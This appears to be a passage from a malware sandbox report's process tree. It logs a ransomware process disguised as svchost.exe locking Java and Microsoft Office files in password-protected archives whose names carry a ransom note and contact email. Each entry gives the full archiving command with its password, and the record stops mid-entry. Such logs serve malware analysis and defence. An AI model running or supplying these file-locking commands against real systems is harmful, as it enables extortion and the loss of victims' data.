  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\jre\THIRDPARTYLICENSEREADME.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2184
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\jvisualvm.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\jvisualvm.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5396
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jdk-1.8\THIRDPARTYLICENSEREADME.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4780
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre-1.8\bin\server\Xusage.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jre-1.8\bin\server\Xusage.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:620
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jre-1.8\lib\deploy\ffjcext.zip" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4784
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre-1.8\lib\jvm.hprof.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jre-1.8\lib\jvm.hprof.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5000
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre-1.8\lib\security\public_suffix_list.dat(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jre-1.8\lib\security\public_suffix_list.dat" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2504
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre-1.8\lib\tzdb.dat(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jre-1.8\lib\tzdb.dat" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5328
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre-1.8\README.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jre-1.8\README.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4196
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME-JAVAFX.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:604
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME.txt(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Java\jre-1.8\THIRDPARTYLICENSEREADME.txt" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\LimitClose.bmp(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\LimitClose.bmp" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5172
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\AppXManifest.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\AppXManifest.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  - System Location Discovery: System Language Discovery
  PID:5776
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\FileSystemMetadata.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\FileSystemMetadata.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:5428
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\Office16\SLERROR.XML(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\Office16\SLERROR.XML" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3180
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0000-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:880
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0016-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2912
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0018-0000-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1700
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0018-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:4552
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1652
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4120
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3604
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1484
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1412
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:2140
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2604
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1632
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4728
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0000-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3944
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00C1-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:960
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0000-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4524
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E1-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:4304
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0000-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4408
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-00E2-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1676
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-0115-0409-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1256
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3101-0000-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2268
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3102-0000-1000-0000000FF1CE.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-3102-0000-1000-0000000FF1CE.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4544
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.common.16.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.common.16.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1864
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AppXManifestLoc.16.en-us.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AppXManifestLoc.16.en-us.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5760
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\PackageManifests\AuthoredExtensions.16.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\PackageManifests\AuthoredExtensions.16.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4488
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Aspect.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Aspect.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5488
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue Green.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue Green.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2600
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue II.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue II.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:3796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue Warm.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue Warm.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5684
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Blue.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5424
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Grayscale.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Grayscale.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:4376
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Green Yellow.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Green Yellow.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5288
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Green.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Green.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2320
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Marquee.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Marquee.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:5304
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Median.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Median.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Office 2007 - 2010.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Office 2007 - 2010.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:1464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange Red.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange Red.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:5316
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml(!! to decrypt email id 440513544 to [email protected] !!)" "C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100rAqwnnFwwnLFrAqFuLFuunLnVtqnVAwFurwqtnrqnu -m0 -y
  2⤵
  PID:2688
- C:\ProgramData\msvkp\svchost.exe
